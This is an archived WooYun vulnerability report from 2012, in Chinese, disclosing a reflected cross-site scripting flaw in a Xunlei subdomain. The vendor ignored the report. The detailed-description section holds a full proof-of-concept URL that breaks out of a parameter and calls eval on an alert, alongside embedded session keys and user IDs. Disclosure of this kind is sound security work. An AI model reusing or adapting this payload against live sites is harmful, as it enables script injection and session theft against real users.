当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-012781

漏洞标题:迅雷某分站Xss漏洞

相关厂商:迅雷

漏洞作者: 波波虎

提交时间:2012-09-27 13:47

修复时间:2012-10-02 13:48

公开时间:2012-10-02 13:48

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:7

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-09-27: 细节已通知厂商并且等待厂商处理中
2012-10-02: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

迅雷某分站用户输入过滤不严,导致Xss

详细说明:

http://f.xunlei.com/ex/savefile?files=[{name:%27273%32.rar%27,cid:%2773848F3D47DAC34A23F7B860DD90B9A9BD8BA32B%27,gcid:
%276BAFBD01583E96A1A7F518C2D39707A2DEADF566%27,section:%27%27,url:%27http://dl1.c6.sendfile.vip.xunlei.com:8000/2734%252Erar?key=953c13cdf61ed238b0d1813c86e8e941%26file_url=%252Fgdrive%252Fresource%252F6B
%252F66%252F6BAFBD01583E96A1A7F518C2D39707A2DEADF566%26file_type=1%26authkey=6C77A8F5E5E455E5DBBDF1B8CED4F6DE2DCA88252846FCCE6655B7787A16E29C
%26exp_time=1350678477%26from_uid=205892769%26task_id=5792264964941945090%26get_uid=7
910099%26reduce_cdn=1%26f=lixian.vip111.xunlei.com%26fid=c4SPPUfaw0oj97hg3ZC5qb2Loyv
%2BRBVjAAAAAGuvvQFYPpahp/UYwtOXB6LerfVm
%26mid=666%26threshold=150%26tid=D2BA0E83A2666249B878251BB1F98CCA
%26srcid=7%26verno=1%27,size:1662338302}]%22%29%29;eval%28%28%22alert
%280%29&jumpkey=97A86B0652180D4DF37D536396174CFA8A9AABD2A98125AE69EBD202D93E9FBF141BC
AC92A009E55A5258CABD6AB6510F9B76115DB66FD0762FCA6436B693BA6F8B38F3F9E86D1E7AB8EFD4674
8C0C88

漏洞证明:


修复方案:

还是要修复的吧。这个还是可以用的

版权声明:转载请注明来源 波波虎@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2012-10-02 13:48

厂商回复:

最新状态:

暂无